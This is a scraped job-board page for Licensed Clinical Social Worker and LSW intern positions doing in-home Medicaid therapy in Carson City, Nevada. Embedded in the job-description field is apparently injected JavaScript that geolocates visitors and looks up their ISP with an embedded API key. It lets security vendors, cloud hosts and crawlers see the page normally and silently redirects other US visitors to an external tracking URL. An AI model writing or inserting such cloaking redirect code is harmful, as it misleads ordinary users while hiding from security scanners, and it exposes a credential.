Licensed Clinical Social Worker (LCSW) OR LSW Clinical Intern

Carson City, NV
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/fd1fc3ad682a4e3c/15ba247ac53009f2ebef079127df4b0232dc65d8956ef465230cde06202ffe7e/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Seeking Licensed Clinical Social Workers (LCSW) or LSW Clinical Interns for in-home therapy services to children, adults, and families with Medicaid Fee for Service.

  • Pay ranges from $100-$130 per client for LCSWs and $76-$93 for LSW Interns. Full-time LCSWs can earn approximately $100,000 annually; part-time options available with a minimum of 10 clients weekly. No micro-managing, flexible scheduling based on availability.
  • Immediate client referrals provided; all necessary software and Medicaid compliance support included. Independent contractor role responsible for taxes and benefits. Incentives available for referrals.
  • Applicants must hold Nevada LCSW or LSW license (or be eligible for an internship). Requires a Master’s in Social Work (MSW). Send resume and 3 references in Word format. Eligible candidates will be contacted by phone.
  • Positions available full-time, part-time, or contract, with potential for clinical internships with free supervision. Work location involves in-home visits; remote work not available.
  • Benefits include a flexible schedule, with expected hours between 15-40 per week.